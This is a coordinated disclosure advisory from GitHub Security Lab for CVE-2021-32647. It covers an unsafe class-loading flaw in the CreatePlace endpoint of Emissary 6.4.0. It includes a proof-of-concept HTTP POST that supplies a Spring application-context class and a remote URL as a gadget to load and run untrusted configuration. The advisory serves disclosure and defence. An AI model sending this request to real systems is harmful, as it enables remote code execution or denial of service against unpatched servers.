Coordinated Disclosure Timeline
- 2021-04-27: Report sent to EmissarySupport@evoforge.org
- 2021-05-28: Advisory is published
Summary
A logged-in user can invoke the constructor of some classes with untrusted data.
Product
National Security Agency Emissary
Tested Version
6.4.0
Details
The CreatePlace REST endpoint accepts an sppClassName parameter which is used to load an arbitrary class. This class is later instantiated using a constructor with the following signature: <constructor>(String, String, String). An attacker may find a gadget (class) in the application classpath that could be used to achieve Remote Code Execution (RCE) or disrupt the application.
POST /emissary/CreatePlace.action HTTP/1.1
Host: localhost:8001
x-requested-by:
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
sppClassName=org.springframework.context.support.FileSystemXmlApplicationContext&sppLocation=bar.bar.bar.http%3A%2F%2Fbar.com&sppDirectory=foo
Impact
Even though the chances to find a gadget (class) that allow arbitrary code execution are low, an attacker can still find gadgets that could potentially crash the application or leak sensitive data.
CVE
- CVE-2021-32647
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-073 in any communication regarding this issue.